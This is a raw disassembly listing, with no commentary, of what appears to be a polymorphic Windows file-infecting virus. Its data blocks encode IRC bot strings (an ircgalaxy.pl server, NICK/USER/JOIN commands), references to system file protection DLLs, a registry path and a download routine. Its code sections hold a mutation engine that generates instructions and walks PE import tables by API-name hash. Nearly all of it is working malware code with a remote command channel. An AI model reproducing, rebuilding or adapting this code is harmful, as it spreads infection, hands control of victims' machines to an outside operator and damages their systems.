push 40h
loc_40AAEE: ; CODE XREF: sub_40A683+412�j
push ecx
push edx
push ebx
loc_40AAF1: ; CODE XREF: sub_40A683+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_40AB00: ; CODE XREF: sub_40A683:loc_40AA86�j
; sub_40A683+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_40A683
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ; •
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ; É
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ; ‹
db 0C4h ; Ä
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ; ƒ
db 0C0h ; À
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ; •
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ; ƒ
db 0C4h ; Ä
db 20h
db 33h ; 3
db 0D2h ; Ò
db 85h ; …
db 0C0h ; À
db 0Fh
db 99h ; ™
db 0C2h ; Â
db 0F7h ; ÷
db 0DAh ; Ú
db 58h ; X
db 23h ; #
db 0C2h ; Â
db 0C3h ; Ã
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ; è
db 0C1h ; Á
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ; „
db 0A5h ; ¥
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ; ‹
db 0D4h ; Ô
db 6Ah ; j
db 0
db 8Bh ; ‹
db 0CCh ; Ì
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ; •
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ; •
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ; …
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ; ‹
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ; ã
db 0Ch
db 8Dh ;
db 95h ; •
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ; Ñ
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ; Ò
db 8Bh ; ‹
db 85h ; …
db 0FEh ; þ
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ; è
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ; è
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ; è
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0F4h ; ô
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ; „
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0DFh ; ß
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 0C7h ; Ç
db 5Fh ; _
db 0C3h ; Ã
db 55h ; U
db 0E8h ; è
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 500000h, 70000000h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 6A6E6F68h
dd 6F637A66h, 4553550Ah, 4A6C2052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 30C78404h
dd 18D5DBCEh, 0C26CCC5Ch, 10A61429h, 0F8C4A684h, 864F88CEh
dd 40375248h, 606E7FAFh, 0BD4000FEh, 0BEF65387h, 0D8B8B352h
dd 9C77466h, 14h dup(0)
; =============== S U B R O U T I N E =======================================
sub_40B4E8 proc near ; CODE XREF: sub_40B59E:loc_40B58C�p
; sub_40B5EF+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+1042F4h], 0
and dword ptr [ebp+1042F8h], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_40B504: ; CODE XREF: sub_40B4E8+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_40B526
cmp eax, [edx+8]
jnb short loc_40B526
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+1042F4h], edx
mov [ebp+1042F8h], eax
jmp short loc_40B52B
; ---------------------------------------------------------------------------
loc_40B526: ; CODE XREF: sub_40B4E8+23�j
; sub_40B4E8+28�j
add edx, 28h
loop loc_40B504
loc_40B52B: ; CODE XREF: sub_40B4E8+3C�j
popa
retn 4
sub_40B4E8 endp
; ---------------------------------------------------------------------------
mov [ebp+102467h], al
call sub_40B59E
push 20h
lea eax, [ebp+102394h]
pop ecx
loc_40B546: ; CODE XREF: __u_____:0040B54D�j
cmp [eax], ebx
jz short loc_40B556
add eax, 4
loop loc_40B546
inc dword ptr [ebp+1042D0h]
retn
; ---------------------------------------------------------------------------
loc_40B556: ; CODE XREF: __u_____:0040B548�j
neg ecx
add ecx, [ebp+102467h]
jecxz short loc_40B570
loc_40B560: ; CODE XREF: __u_____:0040B568�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_40B560
mov [ebp+102394h], ebx
; START OF FUNCTION CHUNK FOR sub_40B59E
loc_40B570: ; CODE XREF: __u_____:0040B55E�j
; sub_40B59E+34�j
cmp dword ptr [edx], 0
jz short loc_40B57A
sub esi, [edx]
add esi, [edx+10h]
loc_40B57A: ; CODE XREF: sub_40B59E-2B�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_40B589
push dword ptr [edx]
jmp short loc_40B58C
; ---------------------------------------------------------------------------
loc_40B589: ; CODE XREF: sub_40B59E-1B�j
push dword ptr [edx+10h]
loc_40B58C: ; CODE XREF: sub_40B59E-17�j
call sub_40B4E8
sub ecx, esi
sub ecx, [ebp+1042F8h]
pop eax
add ecx, [ebx+34h]
retn
; END OF FUNCTION CHUNK FOR sub_40B59E
; =============== S U B R O U T I N E =======================================
sub_40B59E proc near ; CODE XREF: __u_____:0040B535�p
; FUNCTION CHUNK AT 0040B570 SIZE 0000002E BYTES
pop dword ptr [ebp+1042D4h]
mov dword ptr [ebp+1042D0h], 0
call sub_40B5EF
mov eax, [ebp+1042D0h]
call near ptr dword_40AC24+43h
call sub_40B5DB
cmp dword ptr [ebp+1042D0h], 0
jnz short loc_40B5D4
mov [ebp+102410h], ebx
jmp short loc_40B570
; ---------------------------------------------------------------------------
loc_40B5D4: ; CODE XREF: sub_40B59E+2C�j
dec dword ptr [ebp+1042D0h]
retn
sub_40B59E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B5DB proc near ; CODE XREF: sub_40B59E+20�p
pop dword ptr [ebp+1042D4h]
mov [ebp+1042D0h], edx
call sub_40B5EF
xor ecx, ecx
retn
sub_40B5DB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B5EF proc near ; CODE XREF: sub_40B59E+10�p
; sub_40B5DB+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_40B4E8
add edx, [ebp+1042F8h]
add edx, esi
loc_40B603: ; CODE XREF: sub_40B5EF+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_40B714
cmp dword ptr [edx+10h], 0
jz locret_40B714
mov eax, [edx+0Ch]
push eax
call sub_40B4E8
add eax, [ebp+1042F8h]
add eax, esi
push eax
loc_40B629: ; CODE XREF: sub_40B5EF+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_40B649
cmp cl, 2Eh
jz short loc_40B638
loc_40B635: ; CODE XREF: sub_40B5EF+58�j
inc eax
jmp short loc_40B629
; ---------------------------------------------------------------------------
loc_40B638: ; CODE XREF: sub_40B5EF+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_40B635
loc_40B649: ; CODE XREF: sub_40B5EF+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_40B70C
cmp word ptr [eax-2], 3233h
jnz loc_40B70C
push esi
cmp dword ptr [edx], 0
jnz short loc_40B66C
mov ecx, [edx+10h]
jmp short loc_40B66E
; ---------------------------------------------------------------------------
loc_40B66C: ; CODE XREF: sub_40B5EF+76�j
mov ecx, [edx]
loc_40B66E: ; CODE XREF: sub_40B5EF+7B�j
add esi, ecx
push ecx
call sub_40B4E8
add esi, [ebp+1042F8h]
loc_40B67C: ; CODE XREF: sub_40B5EF+90�j
; sub_40B5EF+117�j
lodsd
test eax, eax
js short loc_40B67C
jz loc_40B70B
push dword ptr [ebp+1042F8h]
push eax
call sub_40B4E8
add eax, [ebp+1042F8h]
pop dword ptr [ebp+1042F8h]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_40B6A8: ; CODE XREF: sub_40B5EF+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_40B6BF
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_40B6A8
; ---------------------------------------------------------------------------
loc_40B6BF: ; CODE XREF: sub_40B5EF+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_40B705
cmp ebx, 0DB6E45A8h
jz short loc_40B705
cmp ebx, 0FFA13B59h
jz short loc_40B705
cmp ebx, 0ACB522D6h
jz short loc_40B705
cmp ebx, 0F358E993h
jz short loc_40B705
cmp ebx, 0F358E97Dh
jz short loc_40B705
cmp ebx, 0E1253F46h
jz short loc_40B705
cmp ebx, 0E1253F30h
jz short loc_40B705
call dword ptr [ebp+1042D4h]
loc_40B705: ; CODE XREF: sub_40B5EF+D6�j
; sub_40B5EF+DE�j ...
pop ebx
jmp loc_40B67C
; ---------------------------------------------------------------------------
loc_40B70B: ; CODE XREF: sub_40B5EF+92�j
pop esi
loc_40B70C: ; CODE XREF: sub_40B5EF+60�j
; sub_40B5EF+6C�j
add edx, 14h
jmp loc_40B603
; ---------------------------------------------------------------------------
locret_40B714: ; CODE XREF: sub_40B5EF+18�j
; sub_40B5EF+22�j
retn
sub_40B5EF endp
; ---------------------------------------------------------------------------
db 2, 6Ah, 4
dd 0F549E858h, 9588FFFFh, 102641h, 1831B866h, 0E4C0E202h
dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 41850250h, 0AA001026h
dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
dd 0C3BFE2ABh, 39CC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039C085h
dd 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_40B7AA
or ax, 2589h
jmp short loc_40B7BD
; ---------------------------------------------------------------------------
loc_40B7AA: ; CODE XREF: __u_____:0040B7A2�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_40B7B9
or ax, 2531h
jmp short loc_40B7BD
; ---------------------------------------------------------------------------
loc_40B7B9: ; CODE XREF: __u_____:0040B7B1�j
or ax, 2501h
loc_40B7BD: ; CODE XREF: __u_____:0040B7A8�j
; __u_____:0040B7B7�j
stosw
call near ptr dword_40B718+68h
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_40B7CF proc near ; CODE XREF: __u_____:0040BE1B�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_40B718+68h
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_40B7F7
rdtsc
jmp short loc_40B7F9
; ---------------------------------------------------------------------------
loc_40B7F7: ; CODE XREF: sub_40B7CF+22�j
sub eax, eax
loc_40B7F9: ; CODE XREF: sub_40B7CF+26�j
stosd
retn
sub_40B7CF endp
; =============== S U B R O U T I N E =======================================
sub_40B7FB proc near ; CODE XREF: __u_____:loc_40BE25�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_40B82E
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_40B840
; ---------------------------------------------------------------------------
loc_40B82E: ; CODE XREF: sub_40B7FB+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_40B840: ; CODE XREF: sub_40B7FB+31�j
retn
sub_40B7FB endp
; =============== S U B R O U T I N E =======================================
sub_40B841 proc near ; CODE XREF: sub_40B8B3:loc_40B8DA�p
; sub_40B8B3+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_40B86F
; ---------------------------------------------------------------------------
loc_40B84A: ; CODE XREF: sub_40B841+44�j
mov al, 0FCh
jmp short loc_40B86E
; ---------------------------------------------------------------------------
loc_40B84E: ; CODE XREF: sub_40B841+48�j
mov ax, 0EBh
stosw
jmp short loc_40B86F
; ---------------------------------------------------------------------------
loc_40B856: ; CODE XREF: sub_40B841+4C�j
push 4
pop eax
call near ptr dword_40AC24+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_40B86F
; ---------------------------------------------------------------------------
loc_40B86C: ; CODE XREF: sub_40B841+50�j
mov al, 90h
loc_40B86E: ; CODE XREF: sub_40B841+B�j
; sub_40B841+60�j ...
stosb
loc_40B86F: ; CODE XREF: sub_40B841+7�j
; sub_40B841+13�j ...
push 27h
pop eax
call near ptr dword_40AC24+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_40B8B2
test dl, dl
jz short loc_40B84A
dec dl
jz short loc_40B84E
dec dl
jz short loc_40B856
dec dl
jz short loc_40B86C
dec dl
jz short loc_40B8A3
dec dl
jz short loc_40B8AA
dec dl
jz short loc_40B8AE
mov al, 0F9h
jmp short loc_40B86E
; ---------------------------------------------------------------------------
loc_40B8A3: ; CODE XREF: sub_40B841+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_40B86E
; ---------------------------------------------------------------------------
loc_40B8AA: ; CODE XREF: sub_40B841+58�j
mov al, 0F5h
jmp short loc_40B86E
; ---------------------------------------------------------------------------
loc_40B8AE: ; CODE XREF: sub_40B841+5C�j
mov al, 0F8h
jmp short loc_40B86E
; ---------------------------------------------------------------------------
locret_40B8B2: ; CODE XREF: sub_40B841+40�j
retn
sub_40B841 endp
; =============== S U B R O U T I N E =======================================
sub_40B8B3 proc near ; CODE XREF: __u_____:loc_40BCFC�p
; __u_____:0040BEAF�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_40B8C3
add al, 4
loc_40B8C3: ; CODE XREF: sub_40B8B3+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_40B8DA
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_40B8DA: ; CODE XREF: sub_40B8B3+1E�j
call sub_40B841
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_40B8F1
mov ah, 29h
loc_40B8F1: ; CODE XREF: sub_40B8B3+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_40B841
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_40B914
mov al, 86h
loc_40B914: ; CODE XREF: sub_40B8B3+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_40B928
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_40B928: ; CODE XREF: sub_40B8B3+6C�j
retn
sub_40B8B3 endp
; ---------------------------------------------------------------------------
loc_40B929: ; CODE XREF: sub_40C52F+183�p
lea edi, [ebp+1039CCh]
call sub_40B841
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_40B943
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_40B943 db 0F7h ; ÷ ; CODE XREF: __u_____:0040B93E�j
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_40BBD4
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_40BBD4: ; CODE XREF: __u_____:0040BBC9�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_40BBEB
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_40BC28
; ---------------------------------------------------------------------------
loc_40BBEB: ; CODE XREF: __u_____:0040BBDE�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_40BBFD
mov al, 29h
loc_40BBFD: ; CODE XREF: __u_____:0040BBF9�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
